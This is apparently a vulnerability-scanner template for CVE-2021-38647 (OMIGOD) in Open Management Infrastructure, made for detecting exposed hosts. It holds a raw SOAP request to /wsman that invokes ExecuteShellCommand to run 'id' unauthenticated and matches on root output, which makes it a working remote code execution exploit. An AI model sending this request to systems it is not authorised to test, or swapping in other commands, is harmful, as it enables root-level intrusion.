id: CVE-2021-38647 info: name: Open Management Infrastructure Remote Code Execution Vulnerability author: daffainfo severity: critical tags: cve,cve2021,rce,omi reference: - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647 requests: - raw: - | POST /wsman HTTP/1.1 Connection: Keep-Alive Content-Length: 1505 Content-Type: application/soap+xml;charset=UTF-8 Host: {{Hostname}} HTTP://{{Hostname}}{{Path}}/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand 102400 uuid:0AB58087-C2C3-0005-0000-000000010000 PT1M30S root/scx id 0 matchers-condition: and matchers: - type: word words: - "uid=0(root) gid=0(root) groups=0(root)" part: body - type: status status: - 200